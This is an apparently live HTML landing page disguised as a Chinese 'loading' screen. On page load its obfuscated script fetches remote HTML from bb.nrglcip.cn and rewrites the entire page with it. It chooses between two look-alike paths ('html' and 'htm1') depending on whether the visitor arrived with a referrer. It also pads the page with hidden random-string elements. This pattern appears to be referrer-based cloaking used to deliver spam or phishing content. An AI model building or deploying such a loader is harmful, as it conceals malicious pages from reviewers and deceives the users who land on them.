<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bHF6ne {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bHF6ne .xIpneAZ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bHF6ne .content {
            line-height: 50px;
            text-align: center
        }

        .bHF6ne .img {
            width: 100%
        }

        .bHF6ne .GqLtuBZ1UTm {
            text-align: center
        }

        .bHF6ne .GqLtuBZ1UTm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bHF6ne .GqLtuBZ1UTm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bHF6ne .GqLtuBZ1UTm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bHF6ne .GqLtuBZ1UTm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bHF6ne .GqLtuBZ1UTm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bHF6ne .GqLtuBZ1UTm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bHF6ne .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vC1iJdQORpxJR(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lekqsB5 = vC1iJdQORpxJR('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lekqsB5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lekqsB5 +".html?a=share";
		}
		
        VcMRN9oLM5=url+"#"+new Date().getTime();
        VcMRN9oLM5 && function() {
            $.get(VcMRN9oLM5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >hXJu3kC86Skf4qLNUWQoHbUKkTPtuPHruEOPOJyJiNivSJ4ErTRNP9I4TrKZwIx0N4NUd9PyOXtTv27RXZLg3</ul>
<h1 style='display:none' >r1z6dLwVkSQ3NtIs0i967PZqTTo2oI</h1>
<h1 style='display:none' >r1z6dLwVkSQ3NtIs0i967PZqTTo2oI</h1>
<span style='display:none'>z4ldeDTYgdcEkvy2f2xx8</span>
<p  style='display:none'>IUCLMT4aEkhUYO9tIKvTeOHSfodpCaevsEppXYBSCoAtYfkZvopZxDVgLgk4TunSdaKSRlIibMFCypx</p>
<div style='display:none'>h48H5D9FS3HJgmrGjQzhXJAhLmGNtl7ZFNIF0mm0joDA2SdeWS4gSNvL0lU0nrHPK1yzcMlJZ9T8en3idV</div><div class="bHF6ne">
    <div class="xIpneAZ">
        <div class="GqLtuBZ1UTm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >vmY7Nd1D8BF0Oo6dZ855SOnP5IvzqZdz6vyDt7BABDUE0DgyX0hf1Se9DNsLDNRA6L9QWw</li>
<p  style='display:none'>SlhluB8vKayQk9dX8wMdg7Qf8RYLQSu</p>
<a  href='#' style='display:none'>M8vrIy5wl92DeufFkPve7bE1WKYaR6MXy0saaHyGHOAG0RtmBQEfp2HdW3Uluyw39WUVE</a>
<p  style='display:none'>SlhluB8vKayQk9dX8wMdg7Qf8RYLQSu</p>
<img  src='' style='display:none'></body>
</html>